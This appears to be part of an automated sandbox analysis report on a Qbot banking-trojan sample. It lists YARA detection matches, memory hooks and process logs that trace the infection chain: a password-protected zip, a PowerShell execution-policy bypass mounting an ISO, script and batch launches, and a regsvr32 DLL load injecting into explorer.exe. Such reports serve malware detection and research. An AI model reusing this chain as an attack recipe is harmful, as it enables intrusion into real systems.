          Source: 29.2.explorer.exe.32e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 29.2.explorer.exe.32e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 29.2.explorer.exe.32e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 29.2.explorer.exe.32e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 27.2.regsvr32.exe.31b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 27.2.regsvr32.exe.31b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 29.0.explorer.exe.32e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 29.0.explorer.exe.32e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 0000001D.00000000.511078264.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 0000001D.00000000.511078264.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 0000001B.00000003.499883597.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 0000001B.00000003.499883597.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 0000001B.00000002.511786081.00000000031B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 0000001B.00000002.511786081.00000000031B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 9_2_04EE02C89_2_04EE02C8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_032F678F29_2_032F678F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_032F63D029_2_032F63D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_032F360B29_2_032F360B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_032F2A0629_2_032F2A06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_032F82C029_2_032F82C0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1800,i,15047504098167429117,11276190225124185928,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Calculation#8785(Sep16).html
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Calculation#8785(Sep16).zip
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pabc444 -y -o"C:\Users\user\AppData\Local\Temp\idbrycd1.fis" "C:\Users\user\Downloads\Calculation#8785(Sep16).zip
          Source: C:\Windows\SysWOW64\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\idbrycd1.fis\Calculation#8785.iso
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\idbrycd1.fis\Calculation#8785.iso"
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "E:\more\seeSay.js"
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""E:\more\myTheir.bat" r egs v"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 more/veryAs.db
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1800,i,15047504098167429117,11276190225124185928,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Calculation#8785(Sep16).zipJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pabc444 -y -o"C:\Users\user\AppData\Local\Temp\idbrycd1.fis" "C:\Users\user\Downloads\Calculation#8785(Sep16).zipJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\idbrycd1.fis\Calculation#8785.isoJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "E:\more\seeSay.js" Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\idbrycd1.fis\Calculation#8785.iso"Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""E:\more\myTheir.bat" r egs v"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 more/veryAs.dbJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\b61d9098-6d35-4a63-8391-2365d3e4d4ae.tmpJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeFile created: C:\Users\user\AppData\Local\Temp\unarchiver.logJump to behavior
          Source: classification engineClassification label: mal84.phis.troj.evad.winHTML@48/9@5/6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_032EE503 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,29_2_032EE503
          Source: C:\Windows\SysWOW64\unarchiver.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6316:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3960:120:WilError_01
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\GoogleUpdaterJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""E:\more\myTheir.bat" r egs v"
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
          Source: Binary string: amstream.pdb source: explorer.exe, 0000001D.00000002.722273737.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: amstream.pdbGCTL source: explorer.exe, 0000001D.00000002.722273737.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_032FCB95 push esi; iretd 29_2_032FCB9A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_032FAEB6 push cs; iretd 29_2_032FAE8A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_032FADB4 push cs; iretd 29_2_032FAE8A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_032FB066 push ebx; ret 29_2_032FB067
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_032EEFB8 LoadLibraryA,GetProcAddress,29_2_032EEFB8

          Hooking and other Techniques for Hiding and Protection

          barindex
          Overwrites code with unconditional jumps - possibly settings hooks in foreign process
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 712 base: 93F380 value: E9 B8 6E 9A 02 Jump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
